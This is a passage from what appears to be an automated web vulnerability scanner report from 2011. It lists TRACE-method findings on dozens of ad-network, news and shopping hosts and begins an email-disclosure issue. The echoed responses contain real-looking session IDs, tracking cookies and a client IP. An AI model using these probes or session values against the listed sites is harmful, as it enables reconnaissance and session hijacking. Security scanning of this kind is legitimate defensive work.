Cookie: 964b8709daa897ce; NSC_pqupvu_qppm_iuuq=ffffffff0941323f45525d5f4f58455e445a4a423660; id=deleted; name=deleted; session=deleted; mdata=deleted; OAX=deleted; %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=
...[SNIP]...

24.52. http://optout.mookie1.decdna.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mookie1.decdna.net
Path:   /

Request

TRACE / HTTP/1.0
Host: optout.mookie1.decdna.net
Cookie: 6eb3ccd6d4e428e2

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:35:58 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: optout.mookie1.decdna.net
Cookie: 6eb3ccd6d4e428e2; NSC_pqupvu_efdeob_qppm_iuuq=ffffffff0941322045525d5f4f58455e445a4a423660; id=deleted; name=deleted; %2edecdna%2enet/%2f/1/o=0/cookie
Connection: Keep-Alive
MIG_IP: 50.23.123.106


24.53. http://optout.mookie1.decideinteractive.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mookie1.decideinteractive.com
Path:   /

Request

TRACE / HTTP/1.0
Host: optout.mookie1.decideinteractive.com
Cookie: 28aa161846be890

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:32:03 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: optout.mookie1.decideinteractive.com
Cookie: 28aa161846be890; NSC_pqupvu_efdeobjou_qppm_iuuq=ffffffff0941322345525d5f4f58455e445a4a423660; id=deleted; name=deleted; %2edecideinteractive%2ecom/%2f/1/o=0/cookie
Connection: Keep-Alive
MIG_IP: 50.23.123.106


24.54. http://optout.mookie1.pm14.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mookie1.pm14.com
Path:   /

Request

TRACE / HTTP/1.0
Host: optout.mookie1.pm14.com
Cookie: b556ff5a58d04040

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:36:40 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: optout.mookie1.pm14.com
Cookie: b556ff5a58d04040; NSC_pqupvu_qn14_qppm_iuuq=ffffffff0941322845525d5f4f58455e445a4a423660; id=deleted; name=deleted; %2epm14%2ecom/%2f/1/o=0/cookie
Connection: Keep-Alive
MIG_IP: 50.23.123.106


24.55. http://picasaweb.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /

Request

TRACE / HTTP/1.0
Host: picasaweb.google.com
Cookie: 9ba8091d38e05d16

Response

HTTP/1.0 200 OK
Expires: Sun, 04 Sep 2011 04:17:58 GMT
Date: Sun, 04 Sep 2011 04:17:58 GMT
Cache-Control: private, max-age=0, must-revalidate
Content-Type: message/http; charset=UTF-8
Content-Length: 1270
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

TRACE /errors/405 HTTP/1.1
Host: picasaweb.google.com
Cookie: 9ba8091d38e05d16; _rtok=QKbaKEic9-fH; HSID=ASQKbekgY7NOzCbjB; APISID=yDIrlyJyOEC5lWwI/AaFthBiKWYI1xFYHH; PREF=ID=6140ef94871a2db0:U=9d75f5fa4bcb248c:TM=1310133151:LM=1312213620:S=1dVXBMrxVgTaM0LN; NID=50=RiW-T5rw6UNHE
...[SNIP]...

24.56. http://pixel.33across.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /

Request

TRACE / HTTP/1.0
Host: pixel.33across.com
Cookie: 93852f3247bb12a5

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:36:24 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.33across.com
Cookie: 93852f3247bb12a5; 33x_ps=u%3D8746800456%3As1%3D1312556891392%3Ats%3D1315103782954%3As2.33%3D%2C6940%2C
X-Forwarded-For: 50.23.123.106
rlnclientipaddr: 50.23.123.106


24.57. http://pixel.fetchback.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /

Request

TRACE / HTTP/1.0
Host: pixel.fetchback.com
Cookie: 62eac638a7330414

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:23:11 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.fetchback.com
Cookie: 62eac638a7330414; act=1_1315103291; apd=1_1315135391; bpd=1_1315135391; cmp=1_1315135391_16771:241709; clk=1_1315135391; cre=1_1315135391_34024:68324:1:32100:32100_34021:68285:1:38106:38106_34024:68283:2:38340:38432_3
...[SNIP]...

24.58. http://pixel.rubiconproject.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /

Request

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: ded52cadc0c70318

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:41:20 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: ded52cadc0c70318; rpx=4212%3D14009%2C182%2C2%2C%2C%267249%3D14009%2C0%2C1%2C%2C%262876%3D14126%2C0%2C1%2C%2C%265364%3D14130%2C183%2C2%2C%2C%265421%3D14148%2C510%2C4%2C%2C%264940%3D14297%2C0%2C1%2C%2C%267203%3D14309%2C
...[SNIP]...

24.59. http://pixel.traveladvertising.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.traveladvertising.com
Path:   /

Request

TRACE / HTTP/1.0
Host: pixel.traveladvertising.com
Cookie: 5384be12e1ac6f34

Response

HTTP/1.1 200 OK
Content-Type: message/http
Content-Length: 265
Connection: Close

TRACE / HTTP/1.1
Host: pixel.traveladvertising.com
Cookie: 5384be12e1ac6f34; tan_rt_49602=49602; CookieId=a91131c07f69440bb20ad255c280721b; tan_rt_49600=49600
X-Forwarded-For: 50.23.123.106
X-Forwarded-Port: 80
X-Forwarded-Proto: http
Connection: keep-alive

24.60. http://plg3.yumenetworks.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://plg3.yumenetworks.com
Path:   /

Request

TRACE / HTTP/1.0
Host: plg3.yumenetworks.com
Cookie: ea950371c3d03e66

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:18:50 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.7a DAV/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: plg3.yumenetworks.com
Cookie: ea950371c3d03e66; ymbt=0rO0ABXcQAAAAAQAAAQQAAAU7AAAFPg**; ymdt=0rO0ABXcSAAAFPgAAAAAAAAAAAAA_AAAA; ymf=null; ymvw=50_23_123_106_0VzmEGyAz89Iy4
X-Forwarded-For: 50.23.123.106


24.61. http://r.openx.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /

Request

TRACE / HTTP/1.0
Host: r.openx.net
Cookie: 3ddd5fa28a1f6191

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:29:52 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: r.openx.net
Cookie: 3ddd5fa28a1f6191; i=fbe566bc-e601-4d14-a2ef-601df1907cf9; s=ca27a4d1-a6e2-4a58-b718-effa3a22cdf4; p=1315106926
X-Forwarded-For: 50.23.123.106


24.62. http://s.xp1.ru4.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /

Request

TRACE / HTTP/1.0
Host: s.xp1.ru4.com
Cookie: a591a4bf57197955

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 04 Sep 2011 11:05:23 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: message/http
Connection: close

TRACE / HTTP/1.0
Host: s.xp1.ru4.com
Cookie: a591a4bf57197955; X1ID=OO-00000000000000000
Connection: Keep-Alive
X-xp1-forwarded-for: 50.23.123.106


24.63. http://search.spotxchange.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.spotxchange.com
Path:   /

Request

TRACE / HTTP/1.0
Host: search.spotxchange.com
Cookie: 18b3f42dc550242

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:19:24 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 18b3f42dc550242; history-0=eNrVUMtugzAQPKf%2F0srghIjcQjHEqGCVOGB8I4YIAwGkvoK%2Fvg6k7Q%2B0hx53Z2d2ZujWfzAMY7nYONbyfo9ivH3CHLmbjPaKdK%2BK1EgRGQBx9urcbN%2B4YYOSOS2ur1ho4S6u%2BIjXQvWX0O1lziJVpMmJ%2Bx7ge7zOqd4rBAgVMFR4RWB
...[SNIP]...

24.64. http://server3.yowindow.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server3.yowindow.com
Path:   /

Request

TRACE / HTTP/1.0
Host: server3.yowindow.com
Cookie: 574fbf33183ff3d4

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:31:15 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch mod_perl/2.0.3 Perl/v5.8.8
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: server3.yowindow.com
Cookie: 574fbf33183ff3d4


24.65. http://shopping.indiatimes.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shopping.indiatimes.com
Path:   /

Request

TRACE / HTTP/1.0
Host: shopping.indiatimes.com
Cookie: fdd56c781e1968d0

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:18:41 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_jk/1.2.23
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: shopping.indiatimes.com
Cookie: fdd56c781e1968d0; Apache=50.23.123.106.1315104855341460; JSESSIONID=644D478015FB3E5E8823654476B2CA38.node4; sosh=true; __utma=1.1749513380.1315103166.1315103166.1315103166.1; __utmc=1; __utmz=1.1315103166.1.1.utmcsr=(
...[SNIP]...

24.66. http://smart.synergy-e.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smart.synergy-e.com
Path:   /

Request

TRACE / HTTP/1.0
Host: smart.synergy-e.com
Cookie: b145a061d39105e1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:56 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: smart.synergy-e.com
Cookie: b145a061d39105e1


24.67. http://socialappsintegrator.indiatimes.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://socialappsintegrator.indiatimes.com
Path:   /

Request

TRACE / HTTP/1.0
Host: socialappsintegrator.indiatimes.com
Cookie: 567da78ae7320f3a

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:18:39 GMT
Server: Apache/2.2.11 (Unix) mod_jk/1.2.25
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: socialappsintegrator.indiatimes.com
Cookie: 567da78ae7320f3a; sosh=true; __utma=1.1749513380.1315103166.1315103166.1315103166.1; __utmc=1; __utmz=1.1315103166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _chartbeat2=8l1yir8xsllibs89; _iibeat_session=02f2c
...[SNIP]...

24.68. http://srv.clickfuse.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://srv.clickfuse.com
Path:   /

Request

TRACE / HTTP/1.0
Host: srv.clickfuse.com
Cookie: 50947b05a935aafe

Response

HTTP/1.1 200 OK
Content-Type: message/http
Date: Sun, 04 Sep 2011 03:59:22 GMT
Server: Apache
Content-Length: 189
Connection: Close

TRACE / HTTP/1.1
host: srv.clickfuse.com
Cookie: 50947b05a935aafe; criteo=tagged
X-Forwarded-For: 50.23.123.106
X-Forwarded-Port: 80
X-Forwarded-Proto: http
Connection: keep-alive


24.69. http://stat.synergy-e.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stat.synergy-e.com
Path:   /

Request

TRACE / HTTP/1.0
Host: stat.synergy-e.com
Cookie: 5669f9ac9cb60be8

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:31:00 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: stat.synergy-e.com
Cookie: 5669f9ac9cb60be8


24.70. http://swf.yowindow.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://swf.yowindow.com
Path:   /

Request

TRACE / HTTP/1.0
Host: swf.yowindow.com
Cookie: fbc3d21883228acf

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:29:48 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch mod_perl/2.0.3 Perl/v5.8.8
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: swf.yowindow.com
Cookie: fbc3d21883228acf


24.71. http://system.casalemedia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://system.casalemedia.com
Path:   /

Request

TRACE / HTTP/1.0
Host: system.casalemedia.com
Cookie: 40c416a3e13941c4

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:03:32 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: system.casalemedia.com
Cookie: 40c416a3e13941c4; CMSC=TmLq2Q**; CMTS=''; CMTP=''; CMPP=; CMPS=; CMRUM2=; CMST=; CMIMP=; CMDD=; CMD1=; CMD2=; CMS=; CMID=; CMO=2


24.72. http://t.mookie1.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.mookie1.com
Path:   /

Request

TRACE / HTTP/1.0
Host: t.mookie1.com
Cookie: 99e9ab3500de8e8a

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:23:11 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: t.mookie1.com
Cookie: 99e9ab3500de8e8a; OAX=Mhd7ak5iycEADA/r; id=4612741554684080402; mdata=1|4612741554684080402|1315103146
Connection: Keep-Alive
MIG_IP: 50.23.123.106


24.73. http://tap.rubiconproject.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /

Request

TRACE / HTTP/1.0
Host: tap.rubiconproject.com
Cookie: 3a6446533c4cc347

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:19:38 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: tap.rubiconproject.com
Cookie: 3a6446533c4cc347; SERVERID=; dq=2|2|0|0; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; nus_2046=0.00; ses2=5032^2&9346^1; ruid=154e62c9743217
...[SNIP]...

24.74. http://timescity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://timescity.com
Path:   /

Request

TRACE / HTTP/1.0
Host: timescity.com
Cookie: 147ec0d3484fca65

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:36:48 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: timescity.com
Cookie: 147ec0d3484fca65


24.75. http://twitterapi.indiatimes.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitterapi.indiatimes.com
Path:   /

Request

TRACE / HTTP/1.0
Host: twitterapi.indiatimes.com
Cookie: a49376cbc70394b3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:20:15 GMT
Server: Apache/2.2.9 (Unix) DAV/2 mod_jk/1.2.25
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: twitterapi.indiatimes.com
Cookie: a49376cbc70394b3; JSESSIONID=788EEB6266D73155B2D8DB46D780C84A; sosh=true; __utma=1.1749513380.1315103166.1315103166.1315103166.1; __utmc=1; __utmz=1.1315103166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _chart
...[SNIP]...

24.76. http://usucmweb.dotomi.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usucmweb.dotomi.com
Path:   /

Request

TRACE / HTTP/1.0
Host: usucmweb.dotomi.com
Cookie: 8c5e936a846bfe0f

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 10:59:40 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: usucmweb.dotomi.com
Cookie: 8c5e936a846bfe0f; rt_1982=2; DotomiUser=230900890276886667$0$2054424934; DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaV0%3D; DotomiRR2304=-1$4$1$-1$1$1$; rt_12783=2; Dot
...[SNIP]...

24.77. http://www.addthis.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.addthis.com
Cookie: e8eada75f173f794

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:23:14 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.addthis.com
Cookie: e8eada75f173f794


24.78. http://www.asianewsnet.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.asianewsnet.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.asianewsnet.net
Cookie: de11d4bc418e8451

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:30:26 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.asianewsnet.net
Cookie: de11d4bc418e8451


24.79. http://www.bangkokpost.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.bangkokpost.com
Cookie: b5bcc55b8765f758

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:24:59 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.bangkokpost.com
Cookie: b5bcc55b8765f758; PHPSESSID=s4m8rs24o8o6s2ql7dbjgud8m7; paramsR24=deleted; __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGlmbjBkYzA1YXZxbnNyamJicjNkM2NvZTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TV
...[SNIP]...

24.80. http://www.casalemedia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.casalemedia.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.casalemedia.com
Cookie: 5070e78e2e8d55c0

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 10:59:01 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.casalemedia.com
Cookie: 5070e78e2e8d55c0; CMIMP=102679&1315097282; CMS=65131&1314825471&95308&1314825468&102679&1315097055; CMD1=AAFehU5iyswAAZEXAAOXuwEBAQABK4NOXqT-AAD+awAC-OsBAQAAAUxxTl6k-AABdEwAA0OMAQEA; CMSC=TmLq2Q**; CMTS=''; CMTP=''; C
...[SNIP]...

24.81. http://www.crosspixel.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crosspixel.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.crosspixel.net
Cookie: 38bad19ec3eb3bb

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 10:59:15 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.crosspixel.net
Cookie: 38bad19ec3eb3bb


24.82. http://www.egnyte.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.egnyte.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.egnyte.com
Cookie: a2337a3d962f75a8

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:29:30 GMT
Server: Apache
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.egnyte.com
Cookie: a2337a3d962f75a8; EGNYTE-DIRECT-USER=0; EGNYTE-MARKETING-SESSION-COOKIE=1; EGNYTE-MARKETING-COOKIE=50.23.123.106.1315104951338123


24.83. http://www.fetchback.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fetchback.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.fetchback.com
Cookie: 7334d8e66b92d658

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:03:18 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.fetchback.com
Cookie: 7334d8e66b92d658; act=1_1315103291; apd=1_1315133969; bpd=1_1315133969; cmp=1_1315133969_16771:240287; clk=1_1315133969; cre=1_1315133969_34024:68324:1:30678:30678_34021:68285:1:36684:36684_34024:68283:2:36918:37010_3
...[SNIP]...

24.84. http://www.isomedia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.isomedia.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.isomedia.com
Cookie: f5e935020567996

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:39:38 GMT
Server: Apache/2.0.52 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.isomedia.com
Cookie: f5e935020567996


24.85. http://www.magicbricks.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magicbricks.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.magicbricks.com
Cookie: a0ee3681b9bfd3c7

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:39:47 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_jk/1.2.31 mod_perl/2.0.5 Perl/v5.8.8
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.magicbricks.com
Cookie: a0ee3681b9bfd3c7; JSESSIONID=mCVxbZ3c1OGcp3I81tPbJg**.MBAPP04


24.86. http://www.mathtag.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mathtag.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.mathtag.com
Cookie: 72bbee398ac00ccb

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:04:58 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.mathtag.com
Cookie: 72bbee398ac00ccb; ts=1315103290; uuid=; optout=1


24.87. http://www.nationejobs.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationejobs.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.nationejobs.com
Cookie: 476bfc05a2b7549

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 04 Sep 2011 04:54:48 GMT
Content-Type: message/http
Content-Length: 132

TRACE / HTTP/1.0
Host: www.nationejobs.com
Cookie: 476bfc05a2b7549; PHPSESSID=8617e24bd954e41f15d0606ea5ade984; language=_thai


24.88. http://www.nationmultimedia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationmultimedia.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.nationmultimedia.com
Cookie: b360f3ba95a15276

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:25:03 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.nationmultimedia.com
Cookie: b360f3ba95a15276; PHPSESSID=6b591benlha9rn9pn0k2tvnef6
Via: CN-5000
X-Forwarded-For: 50.23.123.106
Connection: Keep-Alive


24.89. http://www.npr.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.npr.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.npr.org
Cookie: e4719e6ab20201a5

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:44:07 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.npr.org
Cookie: e4719e6ab20201a5
Connection: Keep-Alive
X-Forwarded-For: 50.23.123.106


24.90. http://www.simplymarry.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.simplymarry.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.simplymarry.com
Cookie: 1ac49c85b109aa0a

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:40:47 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_jk/1.2.31
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.simplymarry.com
Cookie: 1ac49c85b109aa0a; JSESSIONID=EFF5BB51C08EA6B27EE4AEDFB0BC3E32.SMAPP03


24.91. http://www.timescity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.timescity.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.timescity.com
Cookie: 550d8cc44d95900b

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:35:04 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.timescity.com
Cookie: 550d8cc44d95900b


24.92. http://www.tribalfusion.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tribalfusion.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.tribalfusion.com
Cookie: 68cac79fd11caf73

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 10:59:00 GMT
Server: Apache/2.2.13 (Unix) PHP/5.3.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 68cac79fd11caf73; ANON_ID=acntIZdr2PKyruYnRY671MyFfmhZdHpni7AU5HqolbGMnoAh1myLwtwKZalWJyuDgb1kXyPrXjePLDOBMZdEl4XqZbFjGfn9fmebZd
X-Cluster-Client-Ip: 50.23.123.106
Connection: Keep-Alive
Host: www.tribalfusion.com
...[SNIP]...

24.93. http://www.zigwheels.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zigwheels.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.zigwheels.com
Cookie: 57387421ad30449f

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:45:25 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_jk/1.2.25 PHP/5.3.1
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.zigwheels.com
Cookie: 57387421ad30449f


24.94. http://yads.zedo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://yads.zedo.com
Path:   /

Request

TRACE / HTTP/1.0
Host: yads.zedo.com
Cookie: c06e16d98ebbb9c4

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:46:34 GMT
Server: ZEDO 3G
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: yads.zedo.com
Cookie: c06e16d98ebbb9c4; FFgeo=5386156; ZCBC=1; FFSkp=305,825,15,1:; 400f78293e722387befae916;expires=Tue, 04 Oct 2011 05:00:00 GMT; ZEDOIDA=mLs5ThcyantsGCRD8ld6EMRU~080311; ZEDOIDX=5; aps=2; FFMChanCap=2457780B305,825#72260
...[SNIP]...

25. Email addresses disclosed  previous  next
There are 86 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


25.1. http://ads4.bangkokpost.co.th/ads_server/iframe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads4.bangkokpost.co.th
Path:   /ads_server/iframe/

Issue detail

The following email address was disclosed in the response:

Request

GET /ads_server/iframe/?&SITE=WEBDIRECTORY&AREA=SPONSOR_C&TYPE=SPONSOR+LINKS&POSITION=POSITION+A&METHOD=IFRAME&CATEGORY=BUSINESS&KEYWORD=&FONT_COLOR=ED7007&ACC_RANDOM=853121136? HTTP/1.1
Host: ads4.bangkokpost.co.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/business/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
